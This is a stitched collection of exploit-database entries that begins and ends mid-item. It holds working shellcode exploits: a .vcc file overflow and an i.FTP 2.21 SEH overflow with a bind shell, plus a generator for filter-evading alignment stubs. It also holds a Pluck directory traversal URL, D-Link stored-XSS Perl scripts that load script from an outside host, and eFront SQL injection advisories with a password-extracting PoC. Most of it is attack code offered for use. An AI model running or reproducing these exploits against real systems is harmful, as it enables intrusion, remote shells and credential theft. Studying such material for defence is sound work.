"\x65\x72\x73\x3e\x0d\x0a\x3c\x53\x69\x7a\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x26\x6c\x74\x3b\x73\x6f\x75\x72\x63\x65\x26\x67\x74"
"\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x72\x69\x67\x69"
"\x6e\x61\x6c\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4f\x72\x69\x67\x69\x6e\x61\x6c\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x3e\x0d\x0a"
"\x3c\x2f\x53\x69\x7a\x65\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x44"
"\x65\x70\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x35\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f"
"\x72\x44\x65\x70\x74\x68\x3e\x0d\x0a\x3c\x43\x72\x6f\x70\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x26\x6c\x74\x3b\x6e\x6f\x6e\x65\x26\x67"
"\x74\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c"
"\x2f\x43\x72\x6f\x70\x3e\x0d\x0a\x3c\x57\x61\x74\x65\x72\x4d\x61"
"\x72\x6b\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x57\x61\x74\x65\x72\x4d"
"\x61\x72\x6b\x3e\x0d\x0a\x3c\x46\x69\x6c\x74\x65\x72\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x69\x6c\x74\x65\x72\x73\x3e\x0d\x0a\x3c"
"\x2f\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f\x47"
"\x49\x46\x41\x3e\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x46\x69"
"\x6c\x65\x46\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b"
"\x44\x69\x72\x73\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b\x44\x69\x72\x45"
"\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x73\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d"
"\x0a\x3c\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65"
"\x72\x6e\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61"
"\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62"
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]
payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R | msfencode BufferRegister=ESP -e x86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x69\x78" +
"\x4d\x59\x37\x70\x63\x30\x55\x50\x51\x70\x6b\x39\x38\x65" +
"\x76\x51\x38\x52\x73\x54\x4e\x6b\x32\x72\x46\x50\x6c\x4b" +
"\x43\x62\x74\x4c\x6c\x4b\x32\x72\x74\x54\x6c\x4b\x74\x32" +
"\x37\x58\x56\x6f\x4f\x47\x52\x6a\x65\x76\x66\x51\x49\x6f" +
"\x36\x51\x39\x50\x4e\x4c\x37\x4c\x35\x31\x43\x4c\x57\x72" +
"\x56\x4c\x61\x30\x4f\x31\x4a\x6f\x46\x6d\x67\x71\x68\x47" +
"\x6d\x32\x68\x70\x43\x62\x53\x67\x6e\x6b\x56\x32\x62\x30" +
"\x4e\x6b\x72\x62\x55\x6c\x45\x51\x6e\x30\x4e\x6b\x61\x50" +
"\x70\x78\x6b\x35\x6f\x30\x63\x44\x63\x7a\x33\x31\x6a\x70" +
"\x70\x50\x4c\x4b\x62\x68\x65\x48\x6c\x4b\x33\x68\x37\x50" +
"\x47\x71\x39\x43\x6b\x53\x35\x6c\x77\x39\x4c\x4b\x34\x74" +
"\x6e\x6b\x73\x31\x6a\x76\x50\x31\x49\x6f\x55\x61\x4b\x70" +
"\x6e\x4c\x69\x51\x5a\x6f\x74\x4d\x56\x61\x5a\x67\x35\x68" +
"\x6b\x50\x33\x45\x38\x74\x57\x73\x33\x4d\x59\x68\x75\x6b" +
"\x31\x6d\x34\x64\x44\x35\x4b\x52\x31\x48\x4c\x4b\x46\x38" +
"\x65\x74\x77\x71\x6a\x73\x35\x36\x6e\x6b\x56\x6c\x30\x4b" +
"\x4c\x4b\x62\x78\x77\x6c\x35\x51\x59\x43\x6c\x4b\x33\x34" +
"\x4c\x4b\x73\x31\x6e\x30\x6b\x39\x72\x64\x44\x64\x75\x74" +
"\x43\x6b\x51\x4b\x65\x31\x52\x79\x62\x7a\x53\x61\x6b\x4f" +
"\x69\x70\x56\x38\x33\x6f\x73\x6a\x4c\x4b\x64\x52\x38\x6b" +
"\x6b\x36\x43\x6d\x51\x7a\x63\x31\x6c\x4d\x6c\x45\x68\x39" +
"\x57\x70\x47\x70\x45\x50\x32\x70\x55\x38\x54\x71\x4e\x6b" +
"\x50\x6f\x6f\x77\x4b\x4f\x59\x45\x6f\x4b\x58\x70\x6c\x75" +
"\x4f\x52\x43\x66\x70\x68\x6e\x46\x6e\x75\x6f\x4d\x4f\x6d" +
"\x4b\x4f\x59\x45\x75\x6c\x47\x76\x33\x4c\x55\x5a\x4d\x50" +
"\x6b\x4b\x59\x70\x64\x35\x73\x35\x6f\x4b\x73\x77\x35\x43" +
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
try:
    print "[+] Creating exploit file...\n"
    f = open("noname1.vcc", "wb")
    f.write(sploit)
    f.close()
    print "[+] File noname1.vcc created successfully.\n"
except IOError as e:
    print "[-] Error: %s\n" % e
#!/usr/bin/python
# Exploit Title : i.FTP 2.21 Time Field SEH Exploit
# Exploit Author : Revin Hadi S
# Vulnerability PoC : Avinash Kumar Thapa "-Acid"
# PoC Link : https://www.exploit-db.com/exploits/36847/
# Date : 05/08/2015
# Vendor : http://www.memecode.com/iftp.php
# Software Link : http://www.memecode.com/data/iftp-win32-v2.21.exe
# Version : 2.21
# Tested On : Win 7 SP1 Eng & Win XP SP2
# Triggering Exploit : Go to Schedule > Schedule download > {+} >Time field
# msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_upper BufferRegister=EAX -t c
shellcode = ("\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x33\x30\x53\x30\x53\x30\x35\x30\x4b\x39"
"\x4a\x45\x30\x31\x4e\x32\x55\x34\x4c\x4b\x31\x42\x46\x50\x4c"
"\x4b\x51\x42\x54\x4c\x4c\x4b\x46\x32\x35\x44\x4c\x4b\x54\x32"
"\x57\x58\x54\x4f\x38\x37\x31\x5a\x31\x36\x50\x31\x4b\x4f\x36"
"\x51\x59\x50\x4e\x4c\x47\x4c\x53\x51\x53\x4c\x44\x42\x56\x4c"
"\x47\x50\x49\x51\x48\x4f\x54\x4d\x43\x31\x39\x57\x4d\x32\x4a"
"\x50\x51\x42\x50\x57\x4c\x4b\x46\x32\x34\x50\x4c\x4b\x51\x52"
"\x37\x4c\x53\x31\x4e\x30\x4c\x4b\x51\x50\x54\x38\x4d\x55\x39"
"\x50\x32\x54\x50\x4a\x45\x51\x58\x50\x56\x30\x4c\x4b\x50\x48"
"\x44\x58\x4c\x4b\x36\x38\x47\x50\x33\x31\x48\x53\x5a\x43\x47"
"\x4c\x30\x49\x4c\x4b\x36\x54\x4c\x4b\x33\x31\x38\x56\x46\x51"
"\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x38\x4f\x44\x4d\x55"
"\x51\x48\x47\x46\x58\x4d\x30\x33\x45\x4b\x44\x44\x43\x53\x4d"
"\x4a\x58\x47\x4b\x43\x4d\x47\x54\x54\x35\x5a\x42\x30\x58\x4c"
"\x4b\x31\x48\x51\x34\x53\x31\x49\x43\x52\x46\x4c\x4b\x44\x4c"
"\x30\x4b\x4c\x4b\x36\x38\x45\x4c\x55\x51\x4e\x33\x4c\x4b\x55"
"\x54\x4c\x4b\x43\x31\x38\x50\x4b\x39\x57\x34\x37\x54\x37\x54"
"\x31\x4b\x51\x4b\x53\x51\x51\x49\x51\x4a\x46\x31\x4b\x4f\x4d"
"\x30\x31\x48\x51\x4f\x31\x4a\x4c\x4b\x55\x42\x5a\x4b\x4c\x46"
"\x31\x4d\x33\x58\x46\x53\x47\x42\x43\x30\x43\x30\x43\x58\x52"
"\x57\x42\x53\x36\x52\x31\x4f\x50\x54\x43\x58\x30\x4c\x52\x57"
"\x51\x36\x43\x37\x4b\x4f\x4e\x35\x38\x38\x4c\x50\x55\x51\x33"
"\x30\x35\x50\x46\x49\x4f\x34\x36\x34\x36\x30\x52\x48\x57\x59"
"\x4d\x50\x52\x4b\x53\x30\x4b\x4f\x58\x55\x46\x30\x50\x50\x36"
"\x30\x30\x50\x31\x50\x46\x30\x31\x50\x50\x50\x35\x38\x4b\x5a"
"\x44\x4f\x39\x4f\x4d\x30\x4b\x4f\x39\x45\x4c\x49\x48\x47\x50"
"\x31\x49\x4b\x46\x33\x52\x48\x43\x32\x55\x50\x32\x36\x50\x42"
"\x4c\x49\x4b\x56\x52\x4a\x52\x30\x36\x36\x31\x47\x43\x58\x39"
"\x52\x59\x4b\x57\x47\x32\x47\x4b\x4f\x39\x45\x50\x53\x46\x37"
"\x32\x48\x38\x37\x4b\x59\x56\x58\x4b\x4f\x4b\x4f\x39\x45\x31"
"\x43\x51\x43\x30\x57\x35\x38\x33\x44\x5a\x4c\x57\x4b\x4b\x51"
"\x4b\x4f\x49\x45\x51\x47\x4c\x49\x4f\x37\x33\x58\x33\x45\x42"
"\x4e\x50\x4d\x33\x51\x4b\x4f\x59\x45\x32\x48\x32\x43\x42\x4d"
"\x52\x44\x43\x30\x4c\x49\x5a\x43\x46\x37\x51\x47\x31\x47\x30"
"\x31\x4a\x56\x52\x4a\x34\x52\x50\x59\x31\x46\x4a\x42\x4b\x4d"
"\x53\x56\x39\x57\x57\x34\x31\x34\x47\x4c\x53\x31\x55\x51\x4c"
"\x4d\x31\x54\x46\x44\x52\x30\x38\x46\x55\x50\x51\x54\x46\x34"
"\x30\x50\x30\x56\x36\x36\x46\x36\x50\x46\x31\x46\x50\x4e\x56"
"\x36\x46\x36\x50\x53\x30\x56\x55\x38\x53\x49\x58\x4c\x37\x4f"
"\x4c\x46\x4b\x4f\x59\x45\x4d\x59\x4b\x50\x50\x4e\x46\x36\x50"
"\x46\x4b\x4f\x50\x30\x53\x58\x43\x38\x4d\x57\x45\x4d\x35\x30"
"\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x58\x35\x39\x32\x56\x36\x33"
"\x58\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x37\x4c"
"\x35\x56\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4d\x30\x33\x45\x44"
"\x45\x4f\x4b\x47\x37\x42\x33\x32\x52\x52\x4f\x52\x4a\x35\x50"
"\x31\x43\x4b\x4f\x39\x45\x41\x41")
# Align EAX to the decoder: the msfencode stub above was built with BufferRegister=EAX,
# so EAX must hold the shellcode's address when it runs. Every byte here is printable,
# which is why SUB (opcode 0x2d, '-') is used: subtracting immediates that sum to
# 0xFFFFFFA0 adds 0x60 to EAX modulo 2**32.
align = "\x58"*3 # POP EAX; POP EAX; POP EAX
align += "\x2d\x77\x77\x77\x77" # SUB EAX, 0x77777777
align += "\x2d\x77\x33\x33\x33" # SUB EAX, 0x33333377
align += "\x2d\x77\x22\x22\x22" # SUB EAX, 0x22222277
align += "\x2d\x3b\x32\x33\x33" # SUB EAX, 0x3333323b (net effect of the four SUBs: EAX += 0x60)
buffer = "A"*300 # padding up to the SEH record
buffer += "\x40\x75\x21\x40" # nSEH: INC EAX; JNZ SHORT +0x21; INC EAX. 0x21 = 1 + 4 + 28 bytes, so the jump lands exactly on align
buffer += "\x67\x59\x02\x10" # SEH handler: 0x10025967, POP POP RET in Lgi.dll
buffer += "DOGE"*7 # 28 bytes that the JNZ skips over
buffer += align
buffer += "\x43"*37 # INC EBX sled (printable stand-in for NOPs)
buffer += shellcode
f = open("evil.txt", "wb") # file contents go into the Time field (see header)
f.write(buffer)
f.close()
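The alignment stub in the exploit above (three POP EAX followed by four SUB EAX, imm32) is the usual way to move EAX by a fixed amount when every instruction byte has to survive a printable-character filter: SUB wraps modulo 2**32, so subtracting immediates that add up to 0xFFFFFFA0 is the same as adding 0x60. The Python 3 below is an added example, not part of Revin Hadi S's exploit or of i.FTP: it decodes the exploit's own stub to recover that net delta, and generates an equivalent SUB chain for any delta using only digits and letters (the original stub uses a slightly wider printable set, including '"', '-' and ';'). The byte set, the four-immediate default and the helper names are my assumptions.

```python
import struct

# Bytes permitted in the generated immediates: digits and ASCII letters (an
# assumption; the exploit above also uses '"', '-' and ';').  The SUB EAX,imm32
# opcode 0x2d is '-', so it passes a printable filter on its own.
ALNUM = bytes(range(0x30, 0x3a)) + bytes(range(0x41, 0x5b)) + bytes(range(0x61, 0x7b))

def net_delta(stub):
    """Parse a run of SUB EAX,imm32 (opcode 0x2d) and return the net change
    to EAX mod 2**32.  Subtracting a sum S is the same as adding 2**32 - S."""
    total = 0
    for off in range(0, len(stub), 5):
        if off + 5 > len(stub) or stub[off] != 0x2d:
            raise ValueError("offset %d is not the start of SUB EAX,imm32" % off)
        total += struct.unpack_from("<I", stub, off + 1)[0]
    return (-total) % 2**32

def _pick(total, n, allowed):
    """n bytes drawn from `allowed` (repeats permitted) that sum to `total`,
    or None.  The min/max bounds prune the search to a handful of steps."""
    if n == 0:
        return [] if total == 0 else None
    if not n * min(allowed) <= total <= n * max(allowed):
        return None
    for b in sorted(allowed, reverse=True):
        rest = _pick(total - b, n - 1, allowed)
        if rest is not None:
            return [b] + rest
    return None

def sub_encode(delta, allowed=ALNUM, count=4):
    """Immediates imm_1..imm_count whose every byte is in `allowed` and whose
    sum is -delta mod 2**32, so SUB EAX,imm_1 ... SUB EAX,imm_count leaves
    EAX += delta.  Solved one byte column at a time, least significant
    first, carrying into the next column exactly as the CPU's adder does."""
    target = (-delta) % 2**32
    columns = [[] for _ in range(count)]   # columns[i] = bytes of imm_i, LSB first
    carry = 0
    for pos in range(4):
        want = (target >> (8 * pos)) & 0xff
        for carry_out in range(count):      # count bytes can carry at most count-1
            picked = _pick(want - carry + 256 * carry_out, count, allowed)
            if picked is not None:
                break
        else:
            raise ValueError("no %d-immediate encoding for byte %d" % (count, pos))
        for i, b in enumerate(picked):
            columns[i].append(b)
        carry = carry_out
    # the carry out of the top byte vanishes in the 32-bit register
    return [struct.unpack("<I", bytes(col))[0] for col in columns]

def sub_stub(immediates):
    """Emit the SUB EAX,imm32 chain as raw bytes."""
    return b"".join(b"\x2d" + struct.pack("<I", imm) for imm in immediates)

def is_clean(blob, allowed=ALNUM):
    """True if every byte of `blob` is in the allowed set or is the 0x2d opcode."""
    return all(b in allowed or b == 0x2d for b in blob)

# The four SUBs from the i.FTP exploit above, as bytes.
IFTP_STUB = (b"\x2d\x77\x77\x77\x77" b"\x2d\x77\x33\x33\x33"
             b"\x2d\x77\x22\x22\x22" b"\x2d\x3b\x32\x33\x33")

if __name__ == "__main__":
    print("exploit stub adds 0x%x to EAX" % net_delta(IFTP_STUB))
    imms = sub_encode(0x60)
    print("alnum-only equivalent:", ["0x%08x" % i for i in imms])
    print("all bytes alphanumeric:", is_clean(sub_stub(imms)))
```

Three immediates are enough when the whole printable range is allowed; with letters and digits only there are residues no three bytes can reach, which is why the default is four, matching the exploit.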
# Exploit Title: Pluck 4.7 Directory Traversal
# Google Dork: filetype:php inurl:"/data/modules/albums/albums_getimage.php?image="
# Date: 08/05/15
# Exploit Author: Wadeek
# Vendor Homepage: http://www.pluck-cms.org/?file=home
# Software Link: http://www.opensourcecms.com/scripts/redirect/download.php?id=167
# Version: 4.7
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini
###################################################################################
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod URL Filter
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem, which forces the
# device administrator to open the page to reconfigure it; at that point
# the injected script runs in the browsers of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
if (@ARGV != 3){
    print "\n";
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
    $ip = $1 if($ip=~/(.*)\/$/);    # strip a trailing slash
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "[+] Exploiting $ip\/ ...\n";
    # Stored payload: a <script src> tag saved as a URL filter entry
    my $payload = "%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E";
    my $ua = new LWP::UserAgent;
    my $hdrs = new HTTP::Headers( Accept => 'text/plain', 'User-Agent' => "XLabs Security Exploit Browser/1.0" );
    $hdrs->authorization_basic($user, $pass);    # the modem's web UI uses HTTP Basic auth
    chomp($ip);
    print "[+] Preparing exploit...\n";
    my $url_and_xpl = "$ip/todmngr.tod?action=set_url&TodUrlAdd=GameOver$payload&port_num=1234";
    my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
    print "[+] Prepared!\n";
    print "[+] Requesting and Exploiting...\n";
    my $resp = $ua->request($req);
    if ($resp->is_success){
        print "[+] Successfully Requested!\n";
        # Verify: fetch the URL filter list and look for the decoded payload in it
        my $url = "$ip/todmngr.tod?action=urlview";
        $req = new HTTP::Request("GET",$url,$hdrs);
        print "[+] Checking that it was exploited...\n";
        my $resp2 = $ua->request($req);
        if ($resp2->is_success){
            my $resultado = $resp2->as_string;
            if(index($resultado, uri_unescape($payload)) != -1){
                print "[+] Successfully Exploited!\n";
            }else{
                print "[-] Not Exploited!\n";
            }
        }
    }else {
        print "[-] Oops!\n";
        print $resp->message;
    }
}
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem, which forces the
# device administrator to open the page to reconfigure it; at that point
# the injected script runs in the browsers of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
if (@ARGV != 3){
    print "\n";
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
    $ip = $1 if($ip=~/(.*)\/$/);    # strip a trailing slash
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "[+] Exploiting $ip\/ ...\n";
    # Stored payload: saved as the username of a time-of-day restriction entry
    my $payload = "%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E";
    my $ua = new LWP::UserAgent;
    my $hdrs = new HTTP::Headers( Accept => 'text/plain', 'User-Agent' => "XLabs Security Exploit Browser/1.0" );
    $hdrs->authorization_basic($user, $pass);    # the modem's web UI uses HTTP Basic auth
    chomp($ip);
    print "[+] Preparing exploit...\n";
    my $url_and_xpl = "$ip/todmngr.tod?action=add&username=$payload&mac=AA:BB:CC:DD:EE:FF&days=1&start_time=720&end_time=840";
    my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
    print "[+] Prepared!\n";
    print "[+] Requesting and Exploiting...\n";
    my $resp = $ua->request($req);
    if ($resp->is_success){
        print "[+] Successfully Requested!\n";
        # Verify: fetch the restriction list and look for the decoded payload in it
        my $url = "$ip/todmngr.tod?action=view";
        $req = new HTTP::Request("GET",$url,$hdrs);
        print "[+] Checking that it was exploited...\n";
        my $resp2 = $ua->request($req);
        if ($resp2->is_success){
            my $resultado = $resp2->as_string;
            if(index($resultado, uri_unescape($payload)) != -1){
                print "[+] Successfully Exploited!\n";
            }else{
                print "[-] Not Exploited!\n";
            }
        }
    }else {
        print "[-] Oops!\n";
        print $resp->message;
    }
}
eFront 3.6.15 Multiple SQL Injection Vulnerabilities
[+] Author: Filippo Roncari | Luca De Fulgentis
[+] Target: eFront
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it
[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”.
[+] Vulnerability Details
The new_sidebar.php module, which handles the left side bar in eFront 3.6.15 default theme, is affected by two SQL injection vulnerabilities due to lack of user input sanitization. The identified issues allow unprivileged users, such as professors and students (under certain conditions), to inject arbitrary SQL statements. An attacker could exploit the vulnerabilities by sending specially crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other impacts depending on the DBMS’s user privileges.
[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code.
[+] Proof of Concept (PoC)
Any unprivileged authenticated user (e.g., student or professor) can exploit this issue, taking into account that:
1. An attacker has to access a lesson (= click on any open lesson) before executing the malicious request.
2. If logged in as a Student, the attacker has to access a lesson for which his User Type has "content" set to hidden.
3. The default theme, or others that use the sidebar, must be in use.
[!] PoC URL
-----------------------------
http://target.site/www/new_sidebar.php?sbctg=lessons&new_lesson_id=null+union+select+password+from+users+where+id=1
-----------------------------
The administrator password hash is returned directly in the HTML body as part of the forum link in the sidebar menu.
[!] HTTP Response
-----------------------------
HTTP/1.1 200 OK
Date: Thu, 09 Apr 2015 22:42:19 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html
Content-Length: 28786
[...]
<div class = "menuOption" name="lessonSpecific" id="forum_a" > <table>
<tr> <td>
<a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" target="mainframe">
<img src='themes/default/images/others/transparent.gif' class = 'handle sprite16 sprite16-message' > </a>
</td>
<td class = "menuListOption" >
<a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" title="Forum" target="mainframe">Forum</a>
</td> </tr>
</table> </div>
[...]
-----------------------------
For further details and explanations check the full advisory.
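How the value of new_lesson_id ends up inside the forum link can be reproduced in a few lines against an in-memory SQLite database. This is an added example and not code from the advisory or from eFront: the two tables, their rows (the password is md5("password"), a constructed sample), and the two function names are assumptions that only mimic the shape of the sidebar's query.

```python
import sqlite3

def make_demo_db():
    """In-memory stand-in for the two eFront tables the PoC touches.
    Rows are constructed for this example; the hash is md5('password')."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users   (id INTEGER PRIMARY KEY, login TEXT, password TEXT);
        CREATE TABLE lessons (id INTEGER PRIMARY KEY, forum TEXT);
        INSERT INTO users   VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO lessons VALUES (8, '8');
    """)
    return db

def forum_link_vulnerable(db, new_lesson_id):
    """The sidebar's mistake reduced to one line: the request parameter is
    pasted into the SQL text, so 'null union select ...' becomes part of the
    statement and its first column is rendered as the forum id."""
    sql = "SELECT forum FROM lessons WHERE id=" + new_lesson_id
    row = db.execute(sql).fetchone()
    return None if row is None else "professor.php?ctg=forum&forum=%s" % row[0]

def forum_link_fixed(db, new_lesson_id):
    """Parametrised query behind a type check: the id never reaches the SQL
    text, and anything that is not an integer is refused before the query."""
    try:
        lesson_id = int(new_lesson_id)
    except ValueError:
        return None
    row = db.execute("SELECT forum FROM lessons WHERE id=?", (lesson_id,)).fetchone()
    return None if row is None else "professor.php?ctg=forum&forum=%s" % row[0]

# The injection from the PoC URL, URL-decoded.
PAYLOAD = "null union select password from users where id=1"

if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable:", forum_link_vulnerable(db, PAYLOAD))
    print("fixed:     ", forum_link_fixed(db, PAYLOAD))
```

The `null` on the left of the UNION makes the legitimate half of the query return nothing, so the single row the page receives is the attacker's SELECT; that is why the hash appears where a forum id should be.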
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
eFront 3.6.15 PHP Object Injection Vulnerability
[+] Author: Filippo Roncari
[+] Target: eFront
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it
[+] Summary
